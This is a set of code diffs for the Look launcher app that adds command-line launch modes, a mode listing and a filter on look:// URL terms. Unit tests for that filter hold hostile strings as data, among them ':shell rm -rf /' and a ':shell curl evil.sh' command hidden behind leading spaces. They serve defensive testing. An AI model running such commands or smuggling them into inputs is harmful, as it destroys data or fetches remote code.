             activateLauncherModeAndFocus()
             // After the reveal, which runs `clearQueryIfRetentionExpired` and
             // would wipe the mode.

--- a/apps/macos/LauncherApp/look-app/Views/Launcher/LauncherView.swift
+++ b/apps/macos/LauncherApp/look-app/Views/Launcher/LauncherView.swift
@@ -880,6 +880,11 @@ struct LauncherView: View {
             reloadQueryRetentionPolicy()
             runningAppsService.refresh()
             actionController.pickedFilePaths = pickedFilePathsForTextOp()
+            // A cold `lookapp <mode>`: this process launched to serve it.
+            if let pending = LaunchModes.pendingQuery {
+                LaunchModes.pendingQuery = nil
+                applyLaunchQuery(pending)
+            }
         }
         // A text op reads the picked file rather than the clipboard, so the
         // controller needs the picks as they change.
@@ -1047,6 +1052,19 @@ struct LauncherView: View {
             }
             activateLauncherModeAndFocus()
             refreshClipboardMonitoringMode()
+        }
+        // `lookapp <mode>` arriving while this instance is already up.
+        .onReceive(
+            DistributedNotificationCenter.default().publisher(
+                for: LaunchModes.deliveryNotification)
+        ) { notification in
+            guard let text = notification.object as? String else { return }
+            NSApplication.shared.activate(ignoringOtherApps: true)
+            revealLauncherWindowIfHidden()
+            activateLauncherModeAndFocus()
+            // After the reveal, which runs `clearQueryIfRetentionExpired` and
+            // would wipe the mode.
+            applyLaunchQuery(text)
         }
         .onReceive(NotificationCenter.default.publisher(for: .lookToggleSettingsRequested)) { _ in
             toggleThemeSettings()
@@ -1569,6 +1587,12 @@ struct LauncherView: View {
         default:
             return false
         }
+    }
+
+    /// Only ever the input: it waits for an Enter a person has to press.
+    private func applyLaunchQuery(_ text: String) {
+        query = text
+        focusActiveInput()
     }
 
     private func setRecalledInput(_ text: String) {

--- a/apps/macos/LauncherApp/look-app/Views/Launcher/LauncherView.swift
+++ b/apps/macos/LauncherApp/look-app/Views/Launcher/LauncherView.swift
@@ -1590,7 +1590,17 @@ struct LauncherView: View {
     }
 
     /// Only ever the input: it waits for an Enter a person has to press.
+    ///
+    /// Whatever the launcher was showing has to be left first. A warm
+    /// `lookapp clipboard` can land while command mode, the AI session, help or
+    /// settings owns the panel, and each of those would swallow the prefix:
+    /// command mode types into `commandInput`, AI into the session, and
+    /// `focusActiveInput` routes to the settings field.
     private func applyLaunchQuery(_ text: String) {
+        exitCommandMode()
+        exitAIToHome()
+        showsHelpScreen = false
+        appUIState.showsThemeSettings = false
         query = text
         focusActiveInput()
     }

--- a/apps/macos/LauncherApp/look-app/look_appApp.swift
+++ b/apps/macos/LauncherApp/look-app/look_appApp.swift
@@ -23,6 +23,11 @@ struct look_appApp: App {
             exit(exitCode)
         }
 
+        if let exitCode = LaunchModes.handleLaunchArguments() {
+            fflush(stdout)
+            exit(exitCode)
+        }
+
         ConfigPathResolver.applyDefaultConfigEnvironmentIfNeeded()
     }
 

--- a/bridge/ffi/src/lib.rs
+++ b/bridge/ffi/src/lib.rs
@@ -8,6 +8,7 @@ mod clipboard_api;
 mod lunar_api;
 mod matching_api;
 mod meeting_api;
+mod modes_api;
 mod netspeed_api;
 mod qactions_api;
 mod runtime_config;
@@ -151,6 +152,24 @@ pub extern "C" fn look_todo_save_json(json: *const c_char) -> bool {
         todo_api::look_todo_save_json_impl(json)
     }))
     .unwrap_or(false)
+}
+
+/// The launch-mode table as `--list-modes` prints it. Free with
+/// `look_free_cstring`.
+#[unsafe(no_mangle)]
+pub extern "C" fn look_modes_list_text() -> *mut c_char {
+    std::panic::catch_unwind(modes_api::look_modes_list_text_impl).unwrap_or(std::ptr::null_mut())
+}
+
+/// Parse argv (a JSON array of strings, program name already dropped) into
+/// `{"kind":"normal"|"query"|"list_modes"|"unknown_mode", ...}`. Free with
+/// `look_free_cstring`.
+#[unsafe(no_mangle)]
+pub extern "C" fn look_modes_parse_json(argv_json: *const c_char) -> *mut c_char {
+    std::panic::catch_unwind(std::panic::AssertUnwindSafe(|| {
+        modes_api::look_modes_parse_json_impl(argv_json)
+    }))
+    .unwrap_or(std::ptr::null_mut())
 }
 
 /// Lunar date JSON (`{day, month, year, leap}`) for a Gregorian `(year, month,

--- a/bridge/ffi/src/modes_api.rs
+++ b/bridge/ffi/src/modes_api.rs
@@ -16,7 +16,7 @@ pub(crate) fn look_modes_list_text_impl() -> *mut c_char {
 }
 
 /// Argv in as a JSON array (program name already dropped), the decision out as
-/// `{"kind":"normal"|"query"|"list_modes"|"unknown_mode", ...}`.
+/// `{"kind":"normal"|"query"|"list_modes"|"unknown_mode"|"unavailable_mode", ...}`.
 pub(crate) fn look_modes_parse_json_impl(argv_json: *const c_char) -> *mut c_char {
     if argv_json.is_null() {
         return allocate(NULL_JSON.to_string());
@@ -31,11 +31,12 @@ pub(crate) fn look_modes_parse_json_impl(argv_json: *const c_char) -> *mut c_cha
     let value = match modes::parse_args(args) {
         modes::Launch::Normal => serde_json::json!({ "kind": "normal" }),
         modes::Launch::ListModes => serde_json::json!({ "kind": "list_modes" }),
-        modes::Launch::Query { text, toggle } => {
-            serde_json::json!({ "kind": "query", "text": text, "toggle": toggle })
-        }
+        modes::Launch::Query { text } => serde_json::json!({ "kind": "query", "text": text }),
         modes::Launch::UnknownMode(name) => {
             serde_json::json!({ "kind": "unknown_mode", "name": name })
+        }
+        modes::Launch::UnavailableMode(name) => {
+            serde_json::json!({ "kind": "unavailable_mode", "name": name })
         }
     };
     allocate(value.to_string())
@@ -73,6 +74,18 @@ mod tests {
 
         assert_eq!(parsed["kind"], "unknown_mode");
         assert_eq!(parsed["name"], "clipbaord");
+    }
+
+    #[test]
+    fn a_mode_this_platform_lacks_crosses_as_its_own_kind() {
+        let parsed = parse(&["ai"]);
+        let expected = if cfg!(target_os = "macos") {
+            "query"
+        } else {
+            "unavailable_mode"
+        };
+
+        assert_eq!(parsed["kind"], expected);
     }
 
     #[test]

--- a/bridge/ffi/src/modes_api.rs
+++ b/bridge/ffi/src/modes_api.rs
@@ -1,0 +1,108 @@
+use crate::state::store_json_allocation;
+use look_engine::modes;
+use std::ffi::{CStr, CString};
+use std::os::raw::c_char;
+
+const NULL_JSON: &str = "null";
+
+fn allocate(json: String) -> *mut c_char {
+    let cstring =
+        CString::new(json).unwrap_or_else(|_| CString::new(NULL_JSON).expect("valid static json"));
+    store_json_allocation(cstring)
+}
+
+pub(crate) fn look_modes_list_text_impl() -> *mut c_char {
+    allocate(modes::list_text())
+}
+
+/// Argv in as a JSON array (program name already dropped), the decision out as
+/// `{"kind":"normal"|"query"|"list_modes"|"unknown_mode", ...}`.
+pub(crate) fn look_modes_parse_json_impl(argv_json: *const c_char) -> *mut c_char {
+    if argv_json.is_null() {
+        return allocate(NULL_JSON.to_string());
+    }
+    let Ok(raw) = (unsafe { CStr::from_ptr(argv_json) }).to_str() else {
+        return allocate(NULL_JSON.to_string());
+    };
+    let Ok(args) = serde_json::from_str::<Vec<String>>(raw) else {
+        return allocate(NULL_JSON.to_string());
+    };
+
+    let value = match modes::parse_args(args) {
+        modes::Launch::Normal => serde_json::json!({ "kind": "normal" }),
+        modes::Launch::ListModes => serde_json::json!({ "kind": "list_modes" }),
+        modes::Launch::Query { text, toggle } => {
+            serde_json::json!({ "kind": "query", "text": text, "toggle": toggle })
+        }
+        modes::Launch::UnknownMode(name) => {
+            serde_json::json!({ "kind": "unknown_mode", "name": name })
+        }
+    };
+    allocate(value.to_string())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn parse(args: &[&str]) -> serde_json::Value {
+        let json = CString::new(serde_json::to_string(args).unwrap()).unwrap();
+        let ptr = look_modes_parse_json_impl(json.as_ptr());
+        let out = unsafe { CStr::from_ptr(ptr) }.to_str().unwrap().to_string();
+        crate::look_free_cstring(ptr);
+        serde_json::from_str(&out).unwrap()
+    }
+
+    #[test]
+    fn a_mode_name_becomes_its_query() {
+        let parsed = parse(&["clipboard", "pass"]);
+
+        assert_eq!(parsed["kind"], "query");
+        assert_eq!(parsed["text"], "c\"pass");
+    }
+
+    #[test]
+    fn an_unrecognised_word_stays_a_normal_launch() {
+        assert_eq!(parse(&["clipbaord"])["kind"], "normal");
+        assert_eq!(parse(&[])["kind"], "normal");
+    }
+
+    #[test]
+    fn an_explicit_unknown_mode_reports_the_name() {
+        let parsed = parse(&["--mode", "clipbaord"]);
+
+        assert_eq!(parsed["kind"], "unknown_mode");
+        assert_eq!(parsed["name"], "clipbaord");
+    }
+
+    #[test]
+    fn listing_is_asked_for_by_kind() {
+        assert_eq!(parse(&["--list-modes"])["kind"], "list_modes");
+    }
+
+    #[test]
+    fn junk_input_returns_null_rather_than_panicking() {
+        let json = CString::new("not json").unwrap();
+        let ptr = look_modes_parse_json_impl(json.as_ptr());
+        let out = unsafe { CStr::from_ptr(ptr) }.to_str().unwrap().to_string();
+        crate::look_free_cstring(ptr);
+
+        assert_eq!(out, NULL_JSON);
+        assert_eq!(
+            unsafe { CStr::from_ptr(look_modes_parse_json_impl(std::ptr::null())) }
+                .to_str()
+                .unwrap(),
+            NULL_JSON
+        );
+    }
+
+    #[test]
+    fn the_listing_comes_back_whole() {
+        let ptr = look_modes_list_text_impl();
+        let text = unsafe { CStr::from_ptr(ptr) }.to_str().unwrap().to_string();
+        crate::look_free_cstring(ptr);
+
+        assert!(text.contains("clipboard"));
+        assert!(text.contains("macOS only"));
+    }
+}

--- a/core/engine/src/lib.rs
+++ b/core/engine/src/lib.rs
@@ -4,6 +4,7 @@ pub mod config_path;
 pub mod index;
 pub mod launchpad;
 pub mod launchpad_values;
+pub mod modes;
 mod normalize;
 mod platform;
 mod query;

--- a/core/engine/src/modes.rs
+++ b/core/engine/src/modes.rs
@@ -20,6 +20,13 @@ impl Platforms {
             Platforms::MacOnly => Some("macOS only"),
         }
     }
+
+    pub fn available_here(self) -> bool {
+        match self {
+            Platforms::All => true,
+            Platforms::MacOnly => cfg!(target_os = "macos"),
+        }
+    }
 }
 
 #[derive(Clone, Copy, Debug)]
@@ -74,7 +81,7 @@ pub const MODES: &[Mode] = &[
         name: "recent",
         aliases: &[],
         prefix: "rc\"",
-        platforms: Platforms::MacOnly,
+        platforms: Platforms::All,
         about: "recent files and folders, newest first",
     },
     Mode {
@@ -83,6 +90,13 @@ pub const MODES: &[Mode] = &[
         prefix: "r\"",
         platforms: Platforms::All,
         about: "regex search",
+    },
+    Mode {
+        name: "processes",
+        aliases: &["ps"],
+        prefix: "ps\"",
+        platforms: Platforms::All,
+        about: "find and kill running processes",
     },
     Mode {
         name: "translate",
@@ -95,7 +109,7 @@ pub const MODES: &[Mode] = &[
         name: "dictionary",
         aliases: &["dict"],
         prefix: "tw\"",
-        platforms: Platforms::All,
+        platforms: Platforms::MacOnly,
         about: "dictionary lookup",
     },
     Mode {
@@ -236,16 +250,17 @@ pub enum Launch {
     Normal,
     Query {
         text: String,
-        toggle: bool,
     },
     ListModes,
     /// Named a mode and got it wrong. An error because they were specific,
     /// unlike a bare word that just means "open".
     UnknownMode(String),
+    /// A real mode this platform does not have.
+    UnavailableMode(String),
 }
 
-/// Arguments after the program name. Precedence: `--list-modes`, `--mode`,
-/// `--query`, then a bare mode name.
+/// Arguments after the program name. Precedence: a bare mode name, then
+/// `--list-modes`, `--mode`, `--query`.
 pub fn parse_args<I, S>(args: I) -> Launch
 where
     I: IntoIterator<Item = S>,
@@ -256,22 +271,33 @@ where
         .map(|arg| arg.as_ref().to_string())
         .collect();
 
+    // Before any flag parsing, so the rest is the term verbatim:
+    // `lookapp shell ls -la` has to keep its `-la`.
+    if let Some(first) = args.first()
+        && let Some(mode) = resolve(first)
+    {
+        return launch(mode, first, &args[1..]);
+    }
+
+    // `--` ends the options, for a term that starts with a hyphen.
+    let (flags, mut verbatim) = match args.iter().position(|arg| arg == "--") {
+        Some(at) => (&args[..at], args[at + 1..].to_vec()),
+        None => (&args[..], Vec::new()),
+    };
+
     let mut positionals: Vec<String> = Vec::new();
     let mut mode_name: Option<String> = None;
     let mut query: Option<String> = None;
     let mut list_modes = false;
     let mut saw_mode_flag = false;
-    let mut toggle = true;
 
     let mut index = 0;
-    while index < args.len() {
-        let arg = args[index].clone();
-        match arg.as_str() {
+    while index < flags.len() {
+        match flags[index].as_str() {
             "--list-modes" => list_modes = true,
-            "--no-toggle" => toggle = false,
             "--mode" => {
                 saw_mode_flag = true;
-                if let Some(value) = args.get(index + 1)
+                if let Some(value) = flags.get(index + 1)
                     && !value.starts_with('-')
                 {
                     mode_name = Some(value.clone());
@@ -279,7 +305,7 @@ where
                 }
             }
             "--query" => {
-                if let Some(value) = args.get(index + 1) {
+                if let Some(value) = flags.get(index + 1) {
                     query = Some(value.clone());
                     index += 1;
                 }
@@ -289,6 +315,7 @@ where
         }
         index += 1;
     }
+    positionals.append(&mut verbatim);
 
     // `--mode` with no name lists rather than erroring: a keybinding has no
     // terminal, so the useful failure is the one that teaches.
@@ -298,28 +325,27 @@ where
 
     if let Some(name) = mode_name {
         return match resolve(&name) {
-            Some(mode) => Launch::Query {
-                text: mode.query(&positionals.join(" ")),
-                toggle,
-            },
+            Some(mode) => launch(mode, &name, &positionals),
             None => Launch::UnknownMode(name),
         };
     }
 
     if let Some(text) = query {
-        return Launch::Query { text, toggle };
-    }
-
-    if let Some((first, rest)) = positionals.split_first()
-        && let Some(mode) = resolve(first)
-    {
-        return Launch::Query {
-            text: mode.query(&rest.join(" ")),
-            toggle,
-        };
+        return Launch::Query { text };
     }
 
     Launch::Normal
+}
+
+/// A resolved mode only opens where it exists. Saying so beats opening a search
+/// for `>` on a machine that has no AI session.
+fn launch(mode: &Mode, name: &str, term: &[String]) -> Launch {
+    if !mode.platforms.available_here() {
+        return Launch::UnavailableMode(name.to_string());
+    }
+    Launch::Query {
+        text: mode.query(&term.join(" ")),
+    }
 }
 
 #[cfg(test)]
@@ -416,7 +442,6 @@ mod tests {
     fn shown(text: &str) -> Launch {
         Launch::Query {
             text: text.to_string(),
-            toggle: true,
         }
     }
 
@@ -456,7 +481,7 @@ mod tests {
         assert_eq!(parse(&["--mode"]), Launch::ListModes);
         assert_eq!(parse(&["--list-modes"]), Launch::ListModes);
         // A flag after `--mode` is not a mode name.
-        assert_eq!(parse(&["--mode", "--no-toggle"]), Launch::ListModes);
+        assert_eq!(parse(&["--mode", "--list-modes"]), Launch::ListModes);
     }
 
     #[test]
@@ -465,14 +490,39 @@ mod tests {
         assert_eq!(parse(&["--query", ":shell ls"]), shown(":shell ls"));
     }
 
+    /// `lookapp shell ls -la` used to lose its `-la`, which is exactly the kind
+    /// of term the free-text modes exist for.
     #[test]
-    fn no_toggle_survives_wherever_it_is_written() {
-        let expected = Launch::Query {
-            text: "c\"".to_string(),
-            toggle: false,
+    fn a_term_keeps_its_hyphenated_arguments() {
+        assert_eq!(parse(&["shell", "ls", "-la"]), shown(":shell ls -la"));
+        assert_eq!(
+            parse(&["--mode", "shell", "--", "ls", "-la"]),
+            shown(":shell ls -la")
+        );
+    }
+
+    #[test]
+    fn a_mode_this_platform_lacks_says_so_rather_than_opening_a_dead_search() {
+        let macos = cfg!(target_os = "macos");
+        let expected = if macos {
+            shown(">")
+        } else {
+            Launch::UnavailableMode("ai".to_string())
         };
-        assert_eq!(parse(&["clipboard", "--no-toggle"]), expected);
-        assert_eq!(parse(&["--no-toggle", "clipboard"]), expected);
+
+        assert_eq!(parse(&["ai"]), expected);
+        assert_eq!(parse(&["--mode", "ai"]), expected);
+    }
+
+    /// The table is the platform's own answer, so a row and its shell have to
+    /// agree: `rc"` is in linows' prefix menu and parsed in shared Rust, and
+    /// `tw"` is not implemented there at all.
+    #[test]
+    fn platform_columns_match_the_shells() {
+        assert_eq!(resolve("recent").unwrap().platforms, Platforms::All);
+        assert_eq!(resolve("processes").unwrap().platforms, Platforms::All);
+        assert_eq!(resolve("dictionary").unwrap().platforms, Platforms::MacOnly);
+        assert_eq!(resolve("ai").unwrap().platforms, Platforms::MacOnly);
     }
 
     #[test]

--- a/core/engine/src/modes.rs
+++ b/core/engine/src/modes.rs
@@ -1,0 +1,540 @@
+//! Launch modes: the names a command line or a URL uses to open Look already in
+//! a particular mode (`lookapp clipboard`).
+//!
+//! One rule for every row: the query is `prefix` followed by the term. Adding a
+//! mode is adding a row; a shell that needs a `match` over mode names has
+//! bypassed this table.
+
+/// A field rather than a `#[cfg]` so `--list-modes` can say "macOS only"
+/// instead of pretending the mode does not exist.
+#[derive(Clone, Copy, Debug, PartialEq, Eq)]
+pub enum Platforms {
+    All,
+    MacOnly,
+}
+
+impl Platforms {
+    pub fn note(self) -> Option<&'static str> {
+        match self {
+            Platforms::All => None,
+            Platforms::MacOnly => Some("macOS only"),
+        }
+    }
+}
+
+#[derive(Clone, Copy, Debug)]
+pub struct Mode {
+    pub name: &'static str,
+    pub aliases: &'static [&'static str],
+    /// Text placed in the input. A term is appended to it verbatim.
+    pub prefix: &'static str,
+    pub platforms: Platforms,
+    /// One line, for `--list-modes`.
+    pub about: &'static str,
+}
+
+impl Mode {
+    pub fn query(&self, term: &str) -> String {
+        format!("{}{}", self.prefix, term)
+    }
+}
+
+/// Listed in this order. The `:` rows keep their trailing space: it is the
+/// jump's trigger, not padding.
+pub const MODES: &[Mode] = &[
+    Mode {
+        name: "clipboard",
+        aliases: &["clip", "cb"],
+        prefix: "c\"",
+        platforms: Platforms::All,
+        about: "clipboard history",
+    },
+    Mode {
+        name: "apps",
+        aliases: &["app"],
+        prefix: "a\"",
+        platforms: Platforms::All,
+        about: "applications only",
+    },
+    Mode {
+        name: "files",
+        aliases: &["file"],
+        prefix: "f\"",
+        platforms: Platforms::All,
+        about: "files only",
+    },
+    Mode {
+        name: "folders",
+        aliases: &["folder", "dirs"],
+        prefix: "d\"",
+        platforms: Platforms::All,
+        about: "folders only",
+    },
+    Mode {
+        name: "recent",
+        aliases: &[],
+        prefix: "rc\"",
+        platforms: Platforms::MacOnly,
+        about: "recent files and folders, newest first",
+    },
+    Mode {
+        name: "regex",
+        aliases: &["re"],
+        prefix: "r\"",
+        platforms: Platforms::All,
+        about: "regex search",
+    },
+    Mode {
+        name: "translate",
+        aliases: &["tr"],
+        prefix: "t\"",
+        platforms: Platforms::All,
+        about: "quick translation",
+    },
+    Mode {
+        name: "dictionary",
+        aliases: &["dict"],
+        prefix: "tw\"",
+        platforms: Platforms::All,
+        about: "dictionary lookup",
+    },
+    Mode {
+        name: "calc",
+        aliases: &["calculator"],
+        prefix: ":calc ",
+        platforms: Platforms::All,
+        about: "calculator panel",
+    },
+    Mode {
+        name: "pomo",
+        aliases: &["pomodoro"],
+        prefix: ":pomo ",
+        platforms: Platforms::All,
+        about: "pomodoro timer",
+    },
+    Mode {
+        name: "todo",
+        aliases: &[],
+        prefix: ":todo ",
+        platforms: Platforms::All,
+        about: "daily tasks",
+    },
+    Mode {
+        name: "speed",
+        aliases: &[],
+        prefix: ":speed ",
+        platforms: Platforms::All,
+        about: "network speed test",
+    },
+    Mode {
+        name: "kill",
+        aliases: &[],
+        prefix: ":kill ",
+        platforms: Platforms::All,
+        about: "running processes",
+    },
+    Mode {
+        name: "shell",
+        aliases: &[],
+        prefix: ":shell ",
+        platforms: Platforms::All,
+        about: "shell command",
+    },
+    Mode {
+        name: "sys",
+        aliases: &[],
+        prefix: ":sys ",
+        platforms: Platforms::All,
+        about: "system info",
+    },
+    Mode {
+        name: "ai",
+        aliases: &["chat", "ask"],
+        prefix: ">",
+        platforms: Platforms::MacOnly,
+        about: "AI session",
+    },
+];
+
+/// The single resolution point: an unmatched name is where a future fallback
+/// goes (user-declared blocks are the obvious candidate), which only stays
+/// possible while callers ask here instead of matching names themselves.
+pub fn resolve(name: &str) -> Option<&'static Mode> {
+    let wanted = name.trim();
+    if wanted.is_empty() {
+        return None;
+    }
+    MODES.iter().find(|mode| {
+        mode.name.eq_ignore_ascii_case(wanted)
+            || mode
+                .aliases
+                .iter()
+                .any(|alias| alias.eq_ignore_ascii_case(wanted))
+    })
+}
+
+/// A term from the `look://` scheme is literal search text and nothing else: no
+/// command panel (`:`), no AI session (`>`), no quote to re-target the prefix.
+/// The URL is reachable from content the user did not write; argv is not, and
+/// is not filtered by this.
+///
+/// Trimmed first, or one leading space walks `:shell` straight through.
+pub fn url_term_is_safe(term: &str) -> bool {
+    let trimmed = term.trim_start();
+    !(trimmed.starts_with(':') || trimmed.starts_with('>') || term.contains('"'))
+}
+
+/// Rendered in core so both shells print the same listing.
+pub fn list_text() -> String {
+    let width = MODES.iter().map(|mode| mode.name.len()).max().unwrap_or(0);
+    let mut out = String::new();
+    for mode in MODES {
+        let aliases = if mode.aliases.is_empty() {
+            String::new()
+        } else {
+            format!(" ({})", mode.aliases.join(", "))
+        };
+        let note = mode
+            .platforms
+            .note()
+            .map(|note| format!(" [{note}]"))
+            .unwrap_or_default();
+        out.push_str(&format!(
+            "{:<width$}  {}{aliases}{note}\n",
+            mode.name, mode.about
+        ));
+    }
+    out
+}
+
+/// For tooling, so a picker or shell completion never hardcodes the list.
+pub fn list_json() -> String {
+    let rows: Vec<serde_json::Value> = MODES
+        .iter()
+        .map(|mode| {
+            serde_json::json!({
+                "name": mode.name,
+                "aliases": mode.aliases,
+                "prefix": mode.prefix,
+                "about": mode.about,
+                "platforms": match mode.platforms {
+                    Platforms::All => "all",
+                    Platforms::MacOnly => "macos",
+                },
+            })
+        })
+        .collect();
+    serde_json::to_string_pretty(&rows).unwrap_or_else(|_| "[]".to_string())
+}
+
+/// What a command line asked for. Parsed in core so `clipboard` cannot mean one
+/// thing on Linux and another on macOS.
+#[derive(Clone, Debug, PartialEq, Eq)]
+pub enum Launch {
+    /// Open as today. Unrecognised arguments land here, which is what keeps
+    /// existing autostart lines working.
+    Normal,
+    Query {
+        text: String,
+        toggle: bool,
+    },
+    ListModes,
+    /// Named a mode and got it wrong. An error because they were specific,
+    /// unlike a bare word that just means "open".
+    UnknownMode(String),
+}
+
+/// Arguments after the program name. Precedence: `--list-modes`, `--mode`,
+/// `--query`, then a bare mode name.
+pub fn parse_args<I, S>(args: I) -> Launch
+where
+    I: IntoIterator<Item = S>,
+    S: AsRef<str>,
+{
+    let args: Vec<String> = args
+        .into_iter()
+        .map(|arg| arg.as_ref().to_string())
+        .collect();
+
+    let mut positionals: Vec<String> = Vec::new();
+    let mut mode_name: Option<String> = None;
+    let mut query: Option<String> = None;
+    let mut list_modes = false;
+    let mut saw_mode_flag = false;
+    let mut toggle = true;
+
+    let mut index = 0;
+    while index < args.len() {
+        let arg = args[index].clone();
+        match arg.as_str() {
+            "--list-modes" => list_modes = true,
+            "--no-toggle" => toggle = false,
+            "--mode" => {
+                saw_mode_flag = true;
+                if let Some(value) = args.get(index + 1)
+                    && !value.starts_with('-')
+                {
+                    mode_name = Some(value.clone());
+                    index += 1;
+                }
+            }
+            "--query" => {
+                if let Some(value) = args.get(index + 1) {
+                    query = Some(value.clone());
+                    index += 1;
+                }
+            }
+            other if !other.starts_with('-') => positionals.push(other.to_string()),
+            _ => {}
+        }
+        index += 1;
+    }
+
+    // `--mode` with no name lists rather than erroring: a keybinding has no
+    // terminal, so the useful failure is the one that teaches.
+    if list_modes || (saw_mode_flag && mode_name.is_none()) {
+        return Launch::ListModes;
+    }
+
+    if let Some(name) = mode_name {
+        return match resolve(&name) {
+            Some(mode) => Launch::Query {
+                text: mode.query(&positionals.join(" ")),
+                toggle,
+            },
+            None => Launch::UnknownMode(name),
+        };
+    }
+
+    if let Some(text) = query {
+        return Launch::Query { text, toggle };
+    }
+
+    if let Some((first, rest)) = positionals.split_first()
+        && let Some(mode) = resolve(first)
+    {
+        return Launch::Query {
+            text: mode.query(&rest.join(" ")),
+            toggle,
+        };
+    }
+
+    Launch::Normal
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn a_mode_resolves_by_name_and_by_alias() {
+        assert_eq!(resolve("clipboard").unwrap().name, "clipboard");
+        assert_eq!(resolve("clip").unwrap().name, "clipboard");
+        assert_eq!(resolve("cb").unwrap().name, "clipboard");
+    }
+
+    #[test]
+    fn resolution_ignores_case_and_surrounding_space() {
+        assert_eq!(resolve("Clipboard").unwrap().name, "clipboard");
+        assert_eq!(resolve("  CLIP  ").unwrap().name, "clipboard");
+    }
+
+    #[test]
+    fn an_unknown_name_resolves_to_nothing_rather_than_guessing() {
+        assert!(resolve("clipbaord").is_none());
+        assert!(resolve("").is_none());
+        assert!(resolve("   ").is_none());
+    }
+
+    #[test]
+    fn a_term_is_appended_to_the_prefix() {
+        assert_eq!(resolve("clip").unwrap().query("password"), "c\"password");
+        assert_eq!(resolve("calc").unwrap().query("2+2"), ":calc 2+2");
+        assert_eq!(resolve("clip").unwrap().query(""), "c\"");
+    }
+
+    /// A row whose prefix is not real grammar ships as a mode that opens an
+    /// empty search, which reads as the feature being broken.
+    #[test]
+    fn every_prefix_is_grammar_the_app_actually_parses() {
+        for mode in MODES {
+            let query_prefix = mode.prefix.ends_with('"');
+            // The trailing space is the `:` jump's trigger, not decoration.
+            let command_jump = mode.prefix.starts_with(':') && mode.prefix.ends_with(' ');
+            let session = mode.prefix == ">";
+
+            assert!(
+                query_prefix || command_jump || session,
+                "mode {} has prefix {:?}, which is none of: a query prefix ending in a quote, \
+                 a `:command ` jump with its trailing space, or the `>` session",
+                mode.name,
+                mode.prefix
+            );
+        }
+    }
+
+    #[test]
+    fn no_two_rows_answer_to_the_same_word() {
+        let mut seen = std::collections::HashSet::new();
+        for mode in MODES {
+            assert!(seen.insert(mode.name), "duplicate mode name: {}", mode.name);
+            for alias in mode.aliases {
+                assert!(
+                    seen.insert(alias),
+                    "alias {alias} collides with another mode or alias"
+                );
+            }
+        }
+    }
+
+    #[test]
+    fn a_url_term_may_not_reach_a_command_panel_or_the_session() {
+        assert!(!url_term_is_safe(":shell rm -rf /"));
+        assert!(!url_term_is_safe(">summarize this"));
+        // The quote would re-target the search onto a different prefix.
+        assert!(!url_term_is_safe("x\"y"));
+    }
+
+    #[test]
+    fn leading_space_does_not_smuggle_a_command_past_the_check() {
+        assert!(!url_term_is_safe("   :shell curl evil.sh"));
+        assert!(!url_term_is_safe("\t>chat"));
+    }
+
+    #[test]
+    fn ordinary_search_text_is_allowed_through() {
+        assert!(url_term_is_safe("password"));
+        assert!(url_term_is_safe("quarterly report 2026"));
+        assert!(url_term_is_safe("a:b"));
+        assert!(url_term_is_safe(""));
+    }
+
+    fn parse(args: &[&str]) -> Launch {
+        parse_args(args.iter().copied())
+    }
+
+    fn shown(text: &str) -> Launch {
+        Launch::Query {
+            text: text.to_string(),
+            toggle: true,
+        }
+    }
+
+    #[test]
+    fn a_bare_mode_name_opens_that_mode() {
+        assert_eq!(parse(&["clipboard"]), shown("c\""));
+        assert_eq!(parse(&["clip"]), shown("c\""));
+    }
+
+    #[test]
+    fn a_term_rides_along_with_the_mode() {
+        assert_eq!(parse(&["clipboard", "password"]), shown("c\"password"));
+        assert_eq!(
+            parse(&["--mode", "clipboard", "quarterly", "report"]),
+            shown("c\"quarterly report")
+        );
+    }
+
+    /// Every WM autostart line in the README depends on this.
+    #[test]
+    fn an_unrecognised_bare_word_still_just_opens_look() {
+        assert_eq!(parse(&["clipbaord"]), Launch::Normal);
+        assert_eq!(parse(&[]), Launch::Normal);
+        assert_eq!(parse(&["--some-future-flag"]), Launch::Normal);
+    }
+
+    #[test]
+    fn an_explicit_unknown_mode_is_an_error() {
+        assert_eq!(
+            parse(&["--mode", "clipbaord"]),
+            Launch::UnknownMode("clipbaord".to_string())
+        );
+    }
+
+    #[test]
+    fn asking_for_a_mode_without_naming_one_lists_them() {
+        assert_eq!(parse(&["--mode"]), Launch::ListModes);
+        assert_eq!(parse(&["--list-modes"]), Launch::ListModes);
+        // A flag after `--mode` is not a mode name.
+        assert_eq!(parse(&["--mode", "--no-toggle"]), Launch::ListModes);
+    }
+
+    #[test]
+    fn query_passes_grammar_through_untouched() {
+        assert_eq!(parse(&["--query", "c\"secret"]), shown("c\"secret"));
+        assert_eq!(parse(&["--query", ":shell ls"]), shown(":shell ls"));
+    }
+
+    #[test]
+    fn no_toggle_survives_wherever_it_is_written() {
+        let expected = Launch::Query {
+            text: "c\"".to_string(),
+            toggle: false,
+        };
+        assert_eq!(parse(&["clipboard", "--no-toggle"]), expected);
+        assert_eq!(parse(&["--no-toggle", "clipboard"]), expected);
+    }
+
+    #[test]
+    fn an_explicit_mode_wins_over_a_positional() {
+        assert_eq!(parse(&["--mode", "calc", "2+2"]), shown(":calc 2+2"));
+    }
+
+    /// An alias that goes unlisted is a way in nobody can find.
+    #[test]
+    fn the_listing_names_every_mode_and_alias() {
+        let listing = list_text();
+        for mode in MODES {
+            assert!(listing.contains(mode.name), "missing mode {}", mode.name);
+            for alias in mode.aliases {
+                assert!(listing.contains(alias), "missing alias {alias}");
+            }
+        }
+    }
+
+    #[test]
+    fn the_listing_says_where_a_mode_is_unavailable() {
+        let listing = list_text();
+        let ai_line = listing
+            .lines()
+            .find(|line| line.starts_with("ai "))
+            .expect("ai should be listed");
+
+        assert!(
+            ai_line.contains("macOS only"),
+            "a Linux user should learn the mode exists and why it is not theirs: {ai_line}"
+        );
+    }
+
+    /// Locked because neither shell's crate compiles everywhere. The plugin
+    /// hands over a `Vec<String>` including argv[0], hence the skip.
+    #[test]
+    fn the_iterator_shapes_the_shells_use_all_compile() {
+        let forwarded: Vec<String> = vec!["lookapp".into(), "clipboard".into(), "pass".into()];
+        assert_eq!(
+            parse_args(forwarded.iter().skip(1)),
+            shown("c\"pass"),
+            "a Vec<String> argv with the program name skipped"
+        );
+
+        let owned: Vec<String> = vec!["clip".into()];
+        assert_eq!(parse_args(owned.into_iter()), shown("c\""));
+
+        assert_eq!(parse_args(["clip"].iter().copied()), shown("c\""));
+        assert_eq!(
+            parse_args(std::env::args().skip(usize::MAX)),
+            Launch::Normal
+        );
+    }
+
+    #[test]
